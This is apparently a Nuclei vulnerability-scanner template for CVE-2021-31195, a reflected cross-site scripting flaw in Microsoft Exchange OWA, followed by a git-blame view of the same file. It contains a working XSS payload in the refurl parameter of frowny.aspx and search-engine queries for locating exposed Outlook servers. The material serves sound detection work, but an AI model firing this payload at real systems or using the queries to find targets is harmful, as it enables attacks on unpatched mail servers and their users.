nuclei-templates/http/cves/2021/CVE-2021-31195.yaml

id: CVE-2021-31195

info:
  name: Microsoft Exchange Server - Cross-Site Scripting
  author: infosecsanyam
  severity: medium
  description: Microsoft Exchange Server, or OWA, is vulnerable to a cross-site scripting vulnerability in refurl parameter of frowny.asp.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the user's browser, potentially leading to session hijacking, data theft, or other malicious activities.
  remediation: |
    Apply the latest security updates provided by Microsoft to mitigate this vulnerability.
  reference:
    - https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html
    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31195
    - https://nvd.nist.gov/vuln/detail/CVE-2021-31195
    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31195
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2021-31195
    cwe-id: CWE-79
    epss-score: 0.92082
    epss-percentile: 0.98927
    cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: microsoft
    product: exchange_server
    shodan-query:
      - http.title:"Outlook"
      - http.favicon.hash:1768726119
      - http.title:"outlook"
      - cpe:"cpe:2.3:a:microsoft:exchange_server"
    fofa-query:
      - title="outlook"
      - icon_hash=1768726119
    google-query: intitle:"outlook"
  tags: cve2021,cve,microsoft,exchange,owa,xss

http:
  - method: GET
    path:
      - '{{BaseURL}}/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};alert(document.domain)//'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'alert(document.domain)//&et=ServerError'
          - 'mail/bootr.ashx'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 500
# digest: 4a0a0047304502200c9bc6152f452ae7228664bef82fa6563727c21333e3add63b2726fb4dd7b4e1022100e5f65d18bee6f51458ec66471225f36aff942abca74f8ae105b0b28ba8a73946:922c64590222798bb761d5b6d8e72950
Dashboard Content Enhancements (#5455) Dashboard Content Enhancements 2022-09-23 17:53:08 +00:00			`id: CVE-2021-31195`
Create ms-exchange-server-reflected-xss.yaml 2021-08-17 08:25:38 +00:00
			`info:`
Dashboard Content Enhancements (#5455) Dashboard Content Enhancements 2022-09-23 17:53:08 +00:00			`name: Microsoft Exchange Server - Cross-Site Scripting`
Create ms-exchange-server-reflected-xss.yaml 2021-08-17 08:25:38 +00:00			`author: infosecsanyam`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`severity: medium`
Dashboard Content Enhancements (#5455) Dashboard Content Enhancements 2022-09-23 17:53:08 +00:00			`description: Microsoft Exchange Server, or OWA, is vulnerable to a cross-site scripting vulnerability in refurl parameter of frowny.asp.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the user's browser, potentially leading to session hijacking, data theft, or other malicious activities.`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`remediation: \|`
			`Apply the latest security updates provided by Microsoft to mitigate this vulnerability.`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-19 13:59:12 +00:00			`reference:`
Satisfying the linter (all errors and warnings) * whitespace modifications only 2021-08-19 14:44:46 +00:00			`- https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html`
Dashboard Content Enhancements (#5455) Dashboard Content Enhancements 2022-09-23 17:53:08 +00:00			`- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31195`
			`- https://nvd.nist.gov/vuln/detail/CVE-2021-31195`
Auto Generated CVE annotations [Fri Sep 23 18:06:19 UTC 2022] :robot: 2022-09-23 18:06:19 +00:00			`- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31195`
TemplateMan Update [Mon Jan 29 17:11:13 UTC 2024] :robot: 2024-01-29 17:11:14 +00:00			`- https://github.com/ARPSyndicate/kenzer-templates`
Dashboard Content Enhancements (#5455) Dashboard Content Enhancements 2022-09-23 17:53:08 +00:00			`classification:`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N`
			`cvss-score: 6.5`
Dashboard Content Enhancements (#5455) Dashboard Content Enhancements 2022-09-23 17:53:08 +00:00			`cve-id: CVE-2021-31195`
Auto Generated CVE annotations [Fri Sep 23 18:06:19 UTC 2022] :robot: 2022-09-23 18:06:19 +00:00			`cwe-id: CWE-79`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`epss-score: 0.92082`
			`epss-percentile: 0.98927`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23::::::`
Update shodan/fofa links to query 2022-07-04 08:46:15 +00:00			`metadata:`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`max-request: 1`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: microsoft`
			`product: exchange_server`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`shodan-query:`
			`- http.title:"Outlook"`
			`- http.favicon.hash:1768726119`
			`- http.title:"outlook"`
			`- cpe:"cpe:2.3:a:microsoft:exchange_server"`
			`fofa-query:`
			`- title="outlook"`
			`- icon_hash=1768726119`
product/queries updated 2024-05-31 19:23:20 +00:00			`google-query: intitle:"outlook"`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cve2021,cve,microsoft,exchange,owa,xss`
Create ms-exchange-server-reflected-xss.yaml 2021-08-17 08:25:38 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create ms-exchange-server-reflected-xss.yaml 2021-08-17 08:25:38 +00:00			`- method: GET`
			`path:`
			`- '{{BaseURL}}/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};alert(document.domain)//'`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
strict matcher 2021-08-17 10:22:22 +00:00			`- 'alert(document.domain)//&et=ServerError'`
			`- 'mail/bootr.ashx'`
Additional matchers update 2021-08-17 09:30:05 +00:00			`condition: and`
Create ms-exchange-server-reflected-xss.yaml 2021-08-17 08:25:38 +00:00
Additional matchers update 2021-08-17 09:30:05 +00:00			`- type: word`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`part: header`
Additional matchers update 2021-08-17 09:30:05 +00:00			`words:`
			`- "text/html"`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00
			`- type: status`
			`status:`
			`- 500`
Auto Template Signing [Sat Jun 8 16:02:16 UTC 2024] :robot: 2024-06-08 16:02:17 +00:00			`# digest: 4a0a0047304502200c9bc6152f452ae7228664bef82fa6563727c21333e3add63b2726fb4dd7b4e1022100e5f65d18bee6f51458ec66471225f36aff942abca74f8ae105b0b28ba8a73946:922c64590222798bb761d5b6d8e72950`